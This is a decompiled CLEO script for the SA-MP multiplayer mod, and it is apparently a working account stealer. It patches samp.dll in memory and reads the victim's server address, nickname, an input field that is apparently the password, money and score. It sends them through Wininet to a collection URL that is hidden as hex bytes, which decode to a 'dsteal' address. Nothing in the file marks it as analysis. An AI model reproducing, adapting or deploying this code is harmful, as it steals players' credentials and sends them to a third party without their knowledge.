- {$CLEO .cs}
- //-------------MAIN---------------
- 0000: NOP
- wait 0
- call @Noname_1646 0
- call @Noname_1506 1 -38
- jump @Noname_1838
- :Noname_38
- wait 0
- 0AA2: 31@ = load_library "kernel32.dll" // IF and SET
- 0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
- 0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
- 0A8E: 33@ = 0@ + 47806 // int
- 0A8D: 32@ = read_memory 33@ size 1 virtual_protect 1
- if
- 32@ == 0
- else_jump @Noname_166
- 0A8E: 3@ = 0@ + 2173568 // int
- :Noname_166
- if
- 32@ == 64
- else_jump @Noname_197
- 0A8E: 3@ = 0@ + 2173624 // int
- :Noname_197
- 0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
- if
- 2@ > 1000
- else_jump @Noname_1108
- 0A8E: 22@ = 2@ + 985 // int
- 0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
- if
- 2@ > 1000
- else_jump @Noname_1108
- 0A8E: 5@ = 23@ + 20 // int
- 0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
- if
- 4@ > 1000
- else_jump @Noname_1108
- 0A8E: 5@ = 4@ + 34 // int
- 0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
- if
- 24@ > 1000
- else_jump @Noname_1108
- if
- 32@ == 0
- else_jump @Noname_383
- 0A8E: 22@ = 0@ + 2173504 // int
- :Noname_383
- if
- 32@ == 64
- else_jump @Noname_414
- 0A8E: 22@ = 0@ + 2173560 // int
- :Noname_414
- 0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
- if
- 1@ > 1000
- else_jump @Noname_1108
- 0A8E: 7@ = 1@ + 40 // int
- 0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
- 0A8E: 5@ = 1@ + 44 // int
- 0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
- if
- 6@ == 1
- else_jump @Noname_539
- if or
- 26@ == 1
- 26@ == 3
- else_jump @Noname_539
- 25@ = 1
- :Noname_539
- if and
- 25@ == 1
- not 6@ == 1
- else_jump @Noname_1108
- 0A8E: 7@ = 1@ + 48 // int
- 0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
- 0A8E: 6@ = 1@ + 36 // int
- 0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
- if
- 32@ == 0
- else_jump @Noname_639
- 0A8E: 6@ = 0@ + 617008 // int
- :Noname_639
- if
- 32@ == 64
- else_jump @Noname_670
- 0A8E: 6@ = 0@ + 515232 // int
- :Noname_670
- 0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
- 0A8E: 6@ = 4@ + 26 // int
- 0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
- 0A8E: 7@ = 4@ + 10 // int
- if
- not 23@ >= 16
- else_jump @Noname_751
- 0085: 12@ = 7@ // (int)
- jump @Noname_763
- :Noname_751
- 0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1
- :Noname_763
- wait 100
- 0A8E: 9@ = 2@ + 710 // int
- 0A8E: 14@ = 2@ + 452 // int
- 0A8E: 8@ = 2@ + 969 // int
- 0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
- 0A8E: 18@ = 4@ + 42 // int
- 0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
- 21@ = Player.Money($0[2])
- 0AC6: 0@ = label @Noname_1802 offset
- call @Noname_1115 0 22@ 4@ 25@ 6@ 7@ 8@ 19@ 10@
- alloc 20@ 1024
- gosub @Noname_1828
- alloc 20@ 456
- format 20@ "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@
- alloc 8@ 356
- format 8@ ""
- call @Noname_1357 1 8@ 9@
- call @Noname_1430 2 9@ 20@
- free 8@
- free 20@
- 25@ = 0
- :Noname_1108
- jump @Noname_38
- :Noname_1115
- 0AA2: 0@ = load_library "kernel32.dll" // IF and SET
- 0AA4: 1@ = get_proc_address "GetLocalTime" library 0@ // IF and SET
- alloc 2@ 32
- 0AA5: call 1@ num_params 1 pop 0 2@
- 0A8D: 3@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 4@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 5@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 6@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 7@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 8@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 9@ = read_memory 2@ size 2 virtual_protect 0
- 2@ += 2
- 0A8D: 10@ = read_memory 2@ size 2 virtual_protect 0
- 2@ -= 30
- ret 8 22@ 4@ 25@ 6@ 7@ 8@ 9@ 10@
- :Noname_1357
- 0AA2: 30@ = load_library "Wininet.dll" // IF and SET
- 0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET
- 0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@
- ret 1 1@
- :Noname_1430
- 0AA2: 30@ = load_library "Wininet.dll" // IF and SET
- 0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET
- 0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@
- ret 0
- :Noname_1506
- 0A9F: 32@ = current_thread_pointer
- 32@ += 16
- 0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
- 0062: 32@ -= 0@ // (int)
- 0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
- 005A: 32@ += 0@ // (int)
- 33@ += 16
- 0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
- 33@ += 44
- 32@ = 0
- :Noname_1597
- 0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
- 33@ += 4
- 32@ += 1
- 32@ > 30
- else_jump @Noname_1597
- ret 0
- :Noname_1646
- 0AA2: 31@ = load_library "kernel32.dll" // IF and SET
- 0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
- 0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
- 0@ += 371500
- 0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
- 0@ += 4
- 0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
- 0@ += 9
- 0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
- 0@ += 4
- 0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
- ret 0
- :Noname_1802
- hex
- 68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
- 2F 61 64 64 2E 70 68 70 3F 00
- end
- :Noname_1828
- 28@ = 637
- return
- :Noname_1838
- end_thread